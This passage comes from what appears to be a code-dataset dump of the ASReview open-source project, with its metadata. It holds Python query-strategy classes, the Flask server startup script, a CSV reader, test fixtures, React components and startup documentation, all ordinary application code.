0.95 would mean\n    that at each query 95% of the instances would be sampled with the max\n    query strategy after which the remaining 5% would be sampled with the\n    random query strategy. It would be called the `max_random` query strategy.\n    Every combination of primitive query strategies is possible.\n\n    Arguments\n    ---------\n    strategy_1: str\n        Name of the first query strategy. Default 'max'.\n    strategy_2: str\n        Name of the second query strategy. Default 'random'.\n    mix_ratio: float\n        Sampling from strategy_1 and strategy_2 according to a Bernoulli\n        distribution. E.g. for mix_ratio=0.95, this implies strategy_1\n        with probability 0.95 and strategy_2 with probability 0.05.\n        Default 0.95.\n    random_state: float\n        Seed for the numpy random number generator.\n    **kwargs: dict\n        Keyword arguments for the two strategies. To specify which of the\n        strategies the argument is for, prepend with the name of the query\n        strategy and an underscore, e.g. 
'max' for maximal sampling.\n \"\"\"\n\n def __init__(\n self,\n strategy_1=\"max\",\n strategy_2=\"random\",\n mix_ratio=0.95,\n random_state=None,\n **kwargs\n ):\n \"\"\"Initialize the Mixed query strategy.\"\"\"\n super(MixedQuery, self).__init__()\n\n self.strategy_1 = strategy_1\n self.strategy_2 = strategy_2\n\n self.mix_ratio = mix_ratio\n self._random_state = get_random_state(random_state)\n\n self.kwargs_1 = _parse_mixed_kwargs(kwargs, strategy_1)\n self.kwargs_2 = _parse_mixed_kwargs(kwargs, strategy_2)\n\n self.query_model1 = get_query_model(strategy_1, **self.kwargs_1)\n if \"random_state\" in self.query_model1.default_param:\n self.query_model1 = get_query_model(\n strategy_1, random_state=self._random_state, **self.kwargs_1\n )\n\n self.query_model2 = get_query_model(strategy_2, **self.kwargs_2)\n if \"random_state\" in self.query_model2.default_param:\n self.query_model2 = get_query_model(\n strategy_2, random_state=self._random_state, **self.kwargs_2\n )\n\n def query(self, X, classifier, n_instances=None, **kwargs):\n # set the number of instances to len(X) if None\n if n_instances is None:\n n_instances = X.shape[0]\n\n # compute the predictions\n predictions = classifier.predict_proba(X)\n\n # Perform the query with strategy 1.\n try:\n query_idx_1 = self.query_model1._query(predictions, n_instances=n_instances)\n except AttributeError:\n # for random for example\n query_idx_1 = self.query_model1.query(X, classifier, n_instances)\n\n # Perform the query with strategy 2.\n try:\n query_idx_2 = self.query_model2._query(predictions, n_instances=n_instances)\n except AttributeError:\n # for random for example\n query_idx_2 = self.query_model2.query(X, classifier, n_instances)\n\n # mix the 2 query strategies into one list\n query_idx_mix = []\n i = 0\n j = 0\n\n while i < len(query_idx_1) and j < len(query_idx_2):\n if self._random_state.rand() < self.mix_ratio:\n query_idx_mix.append(query_idx_1[i])\n i = i + 1\n else:\n query_idx_mix.append(query_idx_2[j])\n j = j + 1\n\n indexes = np.unique(query_idx_mix, return_index=True)[1]\n return [query_idx_mix[i] for i in sorted(indexes)][0:n_instances]\n\n def full_hyper_space(self):\n from hyperopt import hp\n\n space_1, choices_1 = self.query_model1.hyper_space()\n space_2, choices_2 = self.query_model2.hyper_space()\n parameter_space = {}\n hyper_choices = {}\n for key, value in space_1.items():\n new_key = \"qry_\" + self.strategy_1 + key[4:]\n parameter_space[new_key] = value\n hyper_choices[new_key] = choices_1[key]\n\n for key, value in space_2.items():\n new_key = \"qry_\" + self.strategy_2 + key[4:]\n parameter_space[new_key] = value\n hyper_choices[new_key] = choices_2[key]\n\n parameter_space[\"qry_mix_ratio\"] = hp.uniform(\"qry_mix_ratio\", 0, 1)\n\n return parameter_space, hyper_choices\n\n @property\n def name(self):\n return \"_\".join([self.strategy_1, self.strategy_2])\n\n\nclass MaxRandomQuery(MixedQuery):\n \"\"\"Mixed (95% Maximum and 5% Random) query strategy (``max_random``).\n\n A mix of maximum and random query strategies with a mix ratio of 0.95.\n At each query 95% of the instances would be sampled with the maximum\n query strategy after which the remaining 5% would be sampled with\n the random query strategy.\n \"\"\"\n\n name = \"max_random\"\n label = \"Mixed (95% Maximum and 5% Random)\"\n\n def __init__(self, mix_ratio=0.95, random_state=None, **kwargs):\n \"\"\"Initialize the Mixed (Maximum and Random) query strategy.\"\"\"\n super(MaxRandomQuery, self).__init__(\n strategy_1=\"max\",\n 
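# hand off to MixedQuery: strategy_1 (max) is drawn with probability mix_ratio at each query\n            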
strategy_2=\"random\",\n            mix_ratio=mix_ratio,\n            random_state=random_state,\n            **kwargs\n        )\n\n\nclass MaxUncertaintyQuery(MixedQuery):\n    \"\"\"Mixed (95% Maximum and 5% Uncertainty) query strategy (``max_uncertainty``).\n\n    A mix of maximum and uncertainty query strategies with a mix ratio of 0.95.\n    At each query 95% of the instances would be sampled with the maximum\n    query strategy after which the remaining 5% would be sampled with\n    the uncertainty query strategy.\n    \"\"\"\n\n    name = \"max_uncertainty\"\n    label = \"Mixed (95% Maximum and 5% Uncertainty)\"\n\n    def __init__(self, mix_ratio=0.95, random_state=None, **kwargs):\n        \"\"\"Initialize the Mixed (Maximum and Uncertainty) query strategy.\"\"\"\n        super(MaxUncertaintyQuery, self).__init__(\n            strategy_1=\"max\",\n            strategy_2=\"uncertainty\",\n            mix_ratio=mix_ratio,\n            random_state=random_state,\n            **kwargs\n        )\n" }, { "alpha_fraction": 0.6771159768104553, "alphanum_fraction": 0.6771159768104553, "avg_line_length": 25.58333396911621, "blob_id": "70b55dd8185160911028e0ae1b393b800d99472e", "content_id": "dc11a8590d05d99988aceb3013e55e359b0c003c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 319, "license_type": "permissive", "max_line_length": 50, "num_lines": 12, "path": "/asreview/webapp/src/hooks/useAuth.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport AuthContext from \"../context/AuthProvider\";\n\nconst useAuth = () => {\n  const { auth } = React.useContext(AuthContext);\n  React.useDebugValue(auth, (auth) =>\n    auth?.logged_in ? \"Signed In\" : \"Signed Out\",\n  );\n  return React.useContext(AuthContext);\n};\n\nexport default useAuth;\n" }, { "alpha_fraction": 0.6110979914665222, "alphanum_fraction": 0.6138192415237427, "avg_line_length": 31.136882781982422, "blob_id": "a48ecdcc21b2e473c424413c2c8a283ace839a38", "content_id": "7eb6f6e4e0b16992bf46906187ff873352f07f09", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 16904, "license_type": "permissive", "max_line_length": 89, "num_lines": 526, "path": "/asreview/webapp/start_flask.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport logging\nimport os\nimport socket\nimport webbrowser\nfrom pathlib import Path\nfrom threading import Timer\n\ntry:\n import tomllib\nexcept ImportError:\n import tomli as tomllib\n\nfrom flask import Flask\nfrom flask import send_from_directory\nfrom flask.json import jsonify\nfrom flask.templating import render_template\nfrom flask_cors import CORS\nfrom flask_login import LoginManager\nfrom gevent.pywsgi import WSGIServer\nfrom werkzeug.exceptions import InternalServerError\n\nfrom asreview import __version__ as asreview_version\nfrom asreview._deprecated import DeprecateAction\nfrom asreview._deprecated import mark_deprecated_help_strings\nfrom asreview.project import ASReviewProject\nfrom asreview.project import get_project_path\nfrom asreview.project import get_projects\nfrom asreview.utils import asreview_path\nfrom asreview.webapp import DB\nfrom asreview.webapp.api import auth\nfrom asreview.webapp.api import projects\nfrom asreview.webapp.api import team\nfrom asreview.webapp.authentication.models import User\nfrom asreview.webapp.authentication.oauth_handler import OAuthHandler\n\n# Host name\nHOST_NAME = os.getenv(\"ASREVIEW_HOST\")\nif HOST_NAME is None:\n HOST_NAME = \"localhost\"\n# Default Port number\nPORT_NUMBER = 5000\n\n# set logging level\nif (\n os.environ.get(\"FLASK_DEBUG\", \"\") == \"1\"\n or os.environ.get(\"DEBUG\", \"\") == \"1\"\n or os.environ.get(\"FLASK_ENV\", \"\") == \"development\"\n):\n logging.basicConfig(level=logging.DEBUG)\nelse:\n logging.basicConfig(level=logging.INFO)\n\n\ndef _url(host, port, protocol):\n \"\"\"Create url from host and port.\"\"\"\n return f\"{protocol}{host}:{port}/\"\n\n\ndef _check_port_in_use(host, port):\n \"\"\"Check if port is already in use.\n\n Arguments\n ---------\n host: str\n The current host.\n port: int\n The host port to be checked.\n\n Returns\n -------\n bool:\n True if port is in use, false otherwise.\n \"\"\"\n logging.info(f\"Checking if host and port are available :: {host}:{port}\")\n host = host.replace(\"https://\", \"\").replace(\"http://\", \"\")\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex((host, port)) == 0\n\n\ndef _open_browser(host, port, protocol, no_browser):\n \"\"\"Open ASReview in browser if flag is set.\n\n Otherwise, it displays an alert to copy and paste the url\n at which ASReview is currently served.\n \"\"\"\n if no_browser:\n print(\n \"\\nTo access ASReview LAB, copy and paste \"\n \"this url in a browser \"\n f\"{_url(host, port, protocol)}\\n\"\n )\n return\n\n start_url = _url(host, port, protocol)\n Timer(1, lambda: webbrowser.open_new(start_url)).start()\n print(\n f\"Start browser at {start_url}\"\n \"\\n\\n\\n\\nIf your browser doesn't open. 
\"\n f\"Please navigate to '{start_url}'\\n\\n\\n\\n\"\n )\n\n\ndef _lab_parser():\n # parse arguments if available\n parser = argparse.ArgumentParser(\n prog=\"lab\",\n description=\"\"\"ASReview LAB - Active learning for Systematic Reviews.\"\"\", # noqa\n formatter_class=argparse.RawTextHelpFormatter,\n )\n\n parser.add_argument(\n \"--clean-project\",\n dest=\"clean_project\",\n default=None,\n type=str,\n help=\"Safe cleanup of temporary files in project.\",\n )\n\n parser.add_argument(\n \"--clean-all-projects\",\n dest=\"clean_all_projects\",\n default=None,\n action=\"store_true\",\n help=\"Safe cleanup of temporary files in all projects.\",\n )\n\n parser.add_argument(\n \"--ip\",\n default=HOST_NAME,\n type=str,\n action=DeprecateAction,\n help=\"The IP address the server will listen on. Use the --host argument.\",\n )\n\n parser.add_argument(\n \"--host\",\n default=HOST_NAME,\n type=str,\n help=\"The IP address the server will listen on.\",\n )\n\n parser.add_argument(\n \"--port\",\n default=PORT_NUMBER,\n type=int,\n help=\"The port the server will listen on.\",\n )\n\n parser.add_argument(\n \"--enable-auth\",\n dest=\"enable_authentication\",\n action=\"store_true\",\n help=\"Enable authentication.\",\n )\n\n parser.add_argument(\n \"--secret-key\",\n default=None,\n type=str,\n help=\"Secret key for authentication.\",\n )\n\n parser.add_argument(\n \"--salt\",\n default=None,\n type=str,\n help=\"When using authentication, a salt code is needed\" \"for hasing passwords.\",\n )\n\n parser.add_argument(\n \"--flask-configfile\",\n default=\"\",\n type=str,\n help=\"Full path to a TOML file containing Flask parameters\"\n \"for authentication.\",\n )\n\n parser.add_argument(\n \"--no-browser\",\n dest=\"no_browser\",\n action=\"store_true\",\n help=\"Do not open ASReview LAB in a browser after startup.\",\n )\n\n parser.add_argument(\n \"--port-retries\",\n dest=\"port_retries\",\n default=50,\n type=int,\n help=\"The number of additional ports to try if the\"\n \"specified port is not available.\",\n )\n\n parser.add_argument(\n \"--certfile\",\n default=\"\",\n type=str,\n help=\"The full path to an SSL/TLS certificate file.\",\n )\n\n parser.add_argument(\n \"--keyfile\",\n default=\"\",\n type=str,\n help=\"The full path to a private key file for usage with SSL/TLS.\",\n )\n\n parser.add_argument(\n \"--config_file\",\n type=str,\n default=None,\n help=\"Deprecated, see subcommand simulate.\",\n action=DeprecateAction,\n )\n\n parser.add_argument(\n \"--seed\",\n default=None,\n type=int,\n help=\"Deprecated, see subcommand simulate.\",\n action=DeprecateAction,\n )\n\n parser.add_argument(\n \"--embedding\",\n type=str,\n default=None,\n dest=\"embedding_fp\",\n help=\"File path of embedding matrix. 
Required for LSTM models.\",\n )\n return parser\n\n\ndef create_app(**kwargs):\n app = Flask(\n __name__,\n instance_relative_config=True,\n static_folder=\"build/static\",\n template_folder=\"build\",\n )\n\n # Get the ASReview arguments.\n app.config[\"asr_kwargs\"] = kwargs\n app.config[\"AUTHENTICATION_ENABLED\"] = kwargs.get(\"enable_authentication\", False)\n app.config[\"SECRET_KEY\"] = kwargs.get(\"secret_key\", False)\n app.config[\"SECURITY_PASSWORD_SALT\"] = kwargs.get(\"salt\", False)\n app.config[\"PORT\"] = kwargs.get(\"port\")\n app.config[\"HOST\"] = kwargs.get(\"host\")\n\n # Read config parameters if possible, this overrides\n # the previous assignments.\n config_file_path = kwargs.get(\"flask_configfile\", \"\").strip()\n # Use absolute path, because otherwise it is relative to the config root.\n if config_file_path != \"\":\n config_file_path = Path(config_file_path)\n if config_file_path.suffix == \".toml\":\n app.config.from_file(\n config_file_path.absolute(), load=tomllib.load, text=False\n )\n else:\n raise ValueError(\"'flask_configfile' should have a .toml extension\")\n\n # If the frontend runs on a different port, or even on a different\n # URL, then allowed-origins must be set to avoid CORS issues. You can\n # set the allowed-origins in the config file. In the previous lines\n # the config file has been read.\n # If the allowed-origins are not set by now, they are set to\n # False, which will bypass setting any CORS parameters!\n if not app.config.get(\"ALLOWED_ORIGINS\", False):\n app.config[\"ALLOWED_ORIGINS\"] = False\n\n # set env (test / development / production) according to\n # Flask 2.2 specs (ENV is deprecated)\n if app.config.get(\"TESTING\", None) is True:\n env = \"test\"\n elif app.config.get(\"DEBUG\", None) is True:\n env = \"development\"\n else:\n env = \"production\"\n\n # config JSON Web Tokens\n login_manager = LoginManager(app)\n login_manager.init_app(app)\n login_manager.session_protection = \"strong\"\n\n if app.config[\"AUTHENTICATION_ENABLED\"] is False:\n # This is necessary to pass the test_webapp.py tests\n @login_manager.user_loader\n def load_user(user_id):\n return False\n\n # setup all database/authentication related resources,\n # only do this when AUTHENTICATION_ENABLED is explicitly True\n elif app.config[\"AUTHENTICATION_ENABLED\"] is True:\n # Register a callback function for current_user.\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n # In this code-block we make sure certain authentication-related\n # config parameters are set.\n # TODO: should I raise a custom Exception, like MissingParameterError?\n if not app.config.get(\"SECRET_KEY\", False):\n raise ValueError(\n \"Please start an authenticated app with a \"\n + \"secret key parameter (SECRET_KEY)\"\n )\n\n if not app.config.get(\"SECURITY_PASSWORD_SALT\", False):\n raise ValueError(\n \"Please start an authenticated app with a \"\n + \"security password salt (SECURITY_PASSWORD_SALT)\"\n )\n\n if app.config.get(\"EMAIL_VERIFICATION\", False) and not app.config.get(\n \"EMAIL_CONFIG\", False\n ):\n raise ValueError(\n \"Missing email configuration to facilitate email verification\"\n )\n\n # set email config for Flask-Mail\n conf = app.config.get(\"EMAIL_CONFIG\", {})\n app.config[\"MAIL_SERVER\"] = conf.get(\"SERVER\")\n app.config[\"MAIL_PORT\"] = conf.get(\"PORT\", 465)\n app.config[\"MAIL_USERNAME\"] = conf.get(\"USERNAME\")\n app.config[\"MAIL_PASSWORD\"] = conf.get(\"PASSWORD\")\n app.config[\"MAIL_USE_TLS\"] = 
conf.get(\"USE_TLS\", False)\n app.config[\"MAIL_USE_SSL\"] = conf.get(\"USE_SSL\", False)\n app.config[\"MAIL_REPLY_ADDRESS\"] = conf.get(\"REPLY_ADDRESS\")\n\n # We must be sure we have a database URI\n if not app.config.get(\"SQLALCHEMY_DATABASE_URI\", False):\n # create default path\n uri = os.path.join(asreview_path(), f\"asreview.{env}.sqlite\")\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"sqlite:///{uri}\"\n\n # store oauth config in oauth handler\n if bool(app.config.get(\"OAUTH\", False)):\n app.config[\"OAUTH\"] = OAuthHandler(app.config[\"OAUTH\"])\n\n # create the database plus table(s)\n DB.init_app(app)\n with app.app_context():\n DB.create_all()\n\n # Ensure the instance folder exists.\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n # We only need CORS if they are necessary: when the frontend is\n # running on a different port, or even url, we need to set the\n # allowed origins to avoid CORS problems. The allowed-origins\n # can be set in the config file.\n if app.config.get(\"ALLOWED_ORIGINS\", False):\n CORS(app, origins=app.config.get(\"ALLOWED_ORIGINS\"), supports_credentials=True)\n\n with app.app_context():\n app.register_blueprint(projects.bp)\n app.register_blueprint(auth.bp)\n app.register_blueprint(team.bp)\n\n @app.errorhandler(InternalServerError)\n def error_500(e):\n original = getattr(e, \"original_exception\", None)\n\n if original is None:\n # direct 500 error, such as abort(500)\n logging.error(e)\n return jsonify(message=\"Whoops, something went wrong.\"), 500\n\n # wrapped unhandled error\n logging.error(e.original_exception)\n return jsonify(message=str(e.original_exception)), 500\n\n @app.route(\"/\", methods=[\"GET\"])\n @app.route(\"/projects/\", methods=[\"GET\"])\n @app.route(\"/projects/<project_id>/\", methods=[\"GET\"])\n @app.route(\"/projects/<project_id>/<tab>/\", methods=[\"GET\"])\n def index(**kwargs):\n return render_template(\"index.html\")\n\n @app.route(\"/favicon.ico\")\n def send_favicon():\n return send_from_directory(\n \"build\", \"favicon.ico\", mimetype=\"image/vnd.microsoft.icon\"\n )\n\n @app.route(\"/boot\", methods=[\"GET\"])\n def api_boot():\n \"\"\"Get the boot info.\"\"\"\n if app.config.get(\"DEBUG\", None) is True:\n status = \"development\"\n else:\n status = \"asreview\"\n\n # the big one\n authenticated = app.config.get(\"AUTHENTICATION_ENABLED\", False)\n\n response = {\n \"status\": status,\n \"authentication\": authenticated,\n \"version\": asreview_version,\n }\n\n # if we do authentication we have a lot of extra parameters\n if authenticated:\n # if recaptcha config is provided for account creation\n if app.config.get(\"RE_CAPTCHA_V3\", False):\n response[\"recaptchav3_key\"] = app.config[\"RE_CAPTCHA_V3\"].get(\n \"KEY\", False\n )\n\n # check if users can create accounts\n response[\"allow_account_creation\"] = app.config.get(\n \"ALLOW_ACCOUNT_CREATION\", False\n )\n\n response[\"allow_teams\"] = app.config.get(\"ALLOW_TEAMS\", False)\n\n # check if we are doing email verification\n response[\"email_verification\"] = bool(\n app.config.get(\"EMAIL_VERIFICATION\", False)\n )\n\n # check if there is an email server setup (forgot password)\n response[\"email_config\"] = bool(app.config.get(\"EMAIL_CONFIG\", False))\n\n # if oauth config is provided\n if isinstance(app.config.get(\"OAUTH\", False), OAuthHandler):\n params = app.config.get(\"OAUTH\").front_end_params()\n # and there something in it, just to be sure\n if params:\n response[\"oauth\"] = params\n\n return jsonify(response)\n\n 
return app\n\n\ndef main(argv):\n parser = _lab_parser()\n mark_deprecated_help_strings(parser)\n args = parser.parse_args(argv)\n\n app = create_app(**vars(args))\n app.config[\"PROPAGATE_EXCEPTIONS\"] = False\n\n # ssl certificate, key and protocol\n certfile = args.certfile\n keyfile = args.keyfile\n ssl_context = None\n if certfile and keyfile:\n protocol = \"https://\"\n ssl_context = (certfile, keyfile)\n else:\n protocol = \"http://\"\n\n # clean all projects\n # TODO@{Casper}: this needs a little bit\n # of work, we need to access all sub-folders\n if args.clean_all_projects:\n print(\"Cleaning all project files.\")\n for project in get_projects():\n project.clean_tmp_files()\n print(\"Done\")\n return\n\n # clean project by project_id\n # TODO@{Casper}: cleaning without a user context\n # is meaningless -> I think we should remove this\n # option\n if args.clean_project is not None:\n print(f\"Cleaning project file '{args.clean_project}'.\")\n ASReviewProject(get_project_path(args.clean_project)).clean_tmp_files()\n print(\"Done\")\n return\n\n flask_dev = app.config.get(\"DEBUG\", False)\n\n host = app.config.get(\"HOST\")\n port = app.config.get(\"PORT\")\n\n port_retries = args.port_retries\n # if port is already taken find another one\n if not flask_dev:\n original_port = port\n while _check_port_in_use(host, port) is True:\n old_port = port\n port = int(port) + 1\n if port - original_port >= port_retries:\n raise ConnectionError(\n \"Could not find an available port \\n\"\n \"to launch ASReview LAB. Last port \\n\"\n f\"was {str(port)}\"\n )\n print(f\"Port {old_port} is in use.\\n* Trying to start at {port}\")\n\n # open webbrowser if not in flask development mode\n if flask_dev is False:\n _open_browser(host, port, protocol, args.no_browser)\n\n # run app in flask mode only if we run in development mode\n if flask_dev is True:\n app.run(host=host, port=port, ssl_context=ssl_context)\n else:\n ssl_args = {\"keyfile\": keyfile, \"certfile\": certfile} if ssl_context else {}\n server = WSGIServer((host, port), app, **ssl_args)\n server.serve_forever()\n" }, { "alpha_fraction": 0.6124916076660156, "alphanum_fraction": 0.6245802640914917, "avg_line_length": 30.02083396911621, "blob_id": "242a74b9c60669482da5338aa84e82b2216e1175", "content_id": "8cfd0726659d58c0f53e3e9ba1ef880d5502ef53", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1489, "license_type": "permissive", "max_line_length": 82, "num_lines": 48, "path": "/asreview/io/csv_reader.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "# Copyright 2019-2022 The ASReview Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n#     http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport pandas as pd\n\nfrom asreview.io.utils import _standardize_dataframe\n\n\nclass CSVReader:\n    \"\"\"CSV file reader.\"\"\"\n\n    read_format = [\".csv\", \".tab\", \".tsv\"]\n    write_format = [\".csv\", \".tsv\", \".xlsx\"]\n\n    @classmethod\n    def read_data(cls, fp):\n        \"\"\"Import dataset.\n\n        Arguments\n        ---------\n        fp: str, pathlib.Path\n            File path to the CSV file.\n\n        Returns\n        -------\n        pandas.DataFrame:\n            Dataframe with entries.\n        \"\"\"\n        for encoding in [\"utf-8\", \"ISO-8859-1\"]:\n            try:\n                df = pd.read_csv(fp, sep=None, encoding=encoding, engine=\"python\")\n                return _standardize_dataframe(df)\n            except UnicodeDecodeError:\n                # if unicode error, go to next encoding\n                continue\n\n        raise ValueError(\"The encoding of the file is not supported.\")\n" }, { "alpha_fraction": 0.6513761281967163, "alphanum_fraction": 0.6715596318244934, "avg_line_length": 27.6842098236084, "blob_id": "e1f9015a62eb89472a3de792735a190d416056eb", "content_id": "214a6fe4cff9c0d67e0cddafa3c100762d1a6c48", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1090, "license_type": "permissive", "max_line_length": 70, "num_lines": 38, "path": "/asreview/webapp/tests/test_database_and_models/conftest.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import pytest\n\nimport asreview.webapp.tests.utils.crud as crud\nfrom asreview.webapp import DB\n\n\[email protected]()\ndef setup_teardown(auth_app):\n    \"\"\"A fixture for an authenticated app that ensures tests are\n    started with no users and projects.\"\"\"\n    assert crud.count_users() == 0\n    assert crud.count_projects() == 0\n    yield\n    crud.delete_everything(DB)\n\n\[email protected]()\ndef test_data(auth_app):\n    \"\"\"A fixture for an authenticated app, creates 3 users, first user\n    has created 2 projects.\"\"\"\n    user1, _ = crud.create_user1_with_2_projects(DB)\n    user2 = crud.create_user(DB, user=2)\n    user3 = crud.create_user(DB, user=3)\n    assert crud.count_projects() == 2\n    assert crud.count_users() == 3\n    data = {\"user1\": user1, \"user2\": user2, \"user3\": user3}\n    yield data\n    crud.delete_everything(DB)\n\n\[email protected]()\ndef user(auth_app):\n    \"\"\"A fixture for an authenticated app, creates a single user.\"\"\"\n    assert crud.count_projects() == 0\n    user = crud.create_user(DB, 1)\n    assert crud.count_users() == 1\n    yield user\n    crud.delete_everything(DB)\n" }, { "alpha_fraction": 0.525212824344635, "alphanum_fraction": 0.5265225768089294, "avg_line_length": 21.130434036254883, "blob_id": "36b4954c2cc10911b5099af48f94458790a998d9", "content_id": "7e5da478105f93ac84ba58cecf2417b05768e170", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1527, "license_type": "permissive", "max_line_length": 50, "num_lines": 69, "path": "/asreview/webapp/src/ProjectComponents/ReviewComponents/DecisionUndoBar.js", "repo_name": "terrymyc/asreview", 
"src_encoding": "UTF-8", "text": "import React from \"react\";\nimport { Button, Snackbar } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport {\n decisionUndoBarDuration,\n decisionUndoBarMarginBottom,\n} from \"../../globals.js\";\n\nconst PREFIX = \"DecisionUndoBar\";\n\nconst classes = {\n snackbar: `${PREFIX}-snackbar`,\n};\n\nconst Root = styled(\"div\")(({ theme }) => ({\n [`& .${classes.snackbar}`]: {\n marginBottom: decisionUndoBarMarginBottom,\n [theme.breakpoints.down(\"md\")]: {\n marginBottom: 70,\n },\n },\n}));\n\nconst DecisionUndoBar = (props) => {\n const handleClose = (event, reason) => {\n props.close();\n };\n\n const handleUndo = (event, reason) => {\n props.undo();\n };\n\n let anchorOrigin = {\n vertical: \"bottom\",\n horizontal: \"right\",\n };\n\n return (\n <Root>\n <Snackbar\n anchorOrigin={anchorOrigin}\n open={props.state.open}\n autoHideDuration={decisionUndoBarDuration}\n onClose={handleClose}\n message={props.state.message}\n action={\n <div>\n <Button\n disabled={props.disableButton()}\n size=\"small\"\n onClick={handleUndo}\n sx={{\n color: (theme) =>\n theme.palette.mode === \"light\"\n ? \"primary.light\"\n : \"primary.dark\",\n }}\n >\n UNDO\n </Button>\n </div>\n }\n className={classes.snackbar}\n />\n </Root>\n );\n};\n\nexport default DecisionUndoBar;\n" }, { "alpha_fraction": 0.7038189768791199, "alphanum_fraction": 0.7086279988288879, "avg_line_length": 22.403972625732422, "blob_id": "8ec998b6817a93cdd5d50c42b44a1f5c1293f318", "content_id": "ca3e1578c31d9c883a234179aae15fe2250a27ec", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3535, "license_type": "permissive", "max_line_length": 103, "num_lines": 151, "path": "/docs/source/start.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Start ASReview LAB\n==================\n\nAfter you install ASReview LAB, start the program via the command line to\nstart using it.\n\n.. code:: bash\n\n\tasreview lab\n\nWhen you are using Windows, open `CMD.exe` and run the command. When you use\nMacOS or Linux, you can open `Terminal` and run the command.\n\nThe information in the sections below is more advanced and not needed for the\nmajority of the ASReview LAB users.\n\nCommand line arguments for starting ASReview LAB\n------------------------------------------------\n\nASReview LAB provides a powerful command line interface for running ASReview\nLAB with other options or even run tasks like simulations. For a list of\navailable commands in ASReview LAB, type :code:`asreview lab --help`.\n\n:program:`asreview lab` launches the ASReview LAB software (the frontend).\n\n.. code:: bash\n\n asreview lab [options]\n\n\n\n.. program:: asreview lab\n\n.. option:: -h, --help\n\n\tShow help message and exit.\n\n.. option:: --ip IP\n\n The IP address the server will listen on.\n\n.. option:: --port PORT\n\n\tThe port the server will listen on.\n\n.. option:: --port-retries NUMBER_RETRIES\n\n\tThe number of additional ports to try if the specified port is not\n available.\n\n.. option:: --enable-auth ENABLE_AUTH\n\n\tEnable authentication.\n\n.. option:: --secret-key SECRET_KEY\n\n\tSecret key for authentication.\n\n.. option:: --salt SALT\n\n\tWhen using authentication, a salt code is needed for hasing passwords.\n\n.. option:: --flask-configfile FLASK_CONFIGFILE\n\n Full path to a JSON file containing Flask parameters for authentication.\n\n.. 
option:: --no-browser NO_BROWSER\n\n\tDo not open ASReview LAB in a browser after startup.\n\n.. option:: --certfile CERTFILE_FULL_PATH\n\n The full path to an SSL/TLS certificate file.\n\n.. option:: --keyfile KEYFILE_FULL_PATH\n\n The full path to a private key file for usage with SSL/TLS.\n\n.. option:: --embedding EMBEDDING_FP\n\n File path of embedding matrix. Required for LSTM models.\n\n.. option:: --clean-project CLEAN_PROJECT\n\n Safe cleanup of temporary files in project.\n\n.. option:: --clean-all-projects CLEAN_ALL_PROJECTS\n\n Safe cleanup of temporary files in all projects.\n\n.. option:: --seed SEED\n\n\tSeed for the model (classifiers, balance strategies, feature extraction\n\ttechniques, and query strategies). Use an integer between 0 and 2^32 - 1.\n\n\nSet environment variables\n-------------------------\n\nThe following environment variables are available.\n\n.. option:: ASREVIEW_PATH\n\n\tThe path to the folder with project. Default `~/.asreview`.\n\n\nHow you set environment variables depends on the operating system and the\nenvironment in which you deploy ASReview LAB.\n\nIn MacOS or Linux operating systems, you can set environment variables from the command\nline. For example:\n\n.. code:: bash\n\n export ASREVIEW_PATH=~/.asreview\n\nOn Windows, you can use the following syntax:\n\n.. code:: bash\n\n\tset ASREVIEW_PATH=~/.asreview\n\nTo check if you set an environment variable successfully, run the following on \\*nix operating systems:\n\n.. code:: bash\n\n\techo $ASREVIEW_PATH\n\nOr the following on Windows operating systems:\n\n.. code:: bash\n\n\techo %ASREVIEW_PATH%\n\n\nRun ASReview LAB on localhost with a different port\n---------------------------------------------------\n\nBy default, ASReview LAB runs on port 5000. If that port is already in use or\nif you want to specify a different port, start ASReview LAB with the following\ncommand:\n\n.. code:: bash\n\n\tasreview lab --port <port>\n\nFor example, start ASReview LAB on port 5001:\n\n.. code:: bash\n\n\tasreview lab --port 5001\n\n" }, { "alpha_fraction": 0.5364744067192078, "alphanum_fraction": 0.5413485169410706, "avg_line_length": 34.37356185913086, "blob_id": "05b8b2b03666a41252f5bd3360433fb4c4b08fd3", "content_id": "2d6c043ed67d52f63684453c28e96c42fef81ef9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6155, "license_type": "permissive", "max_line_length": 87, "num_lines": 174, "path": "/asreview/io/ris_reader.py", "repo_name": "terrymyc/asreview", 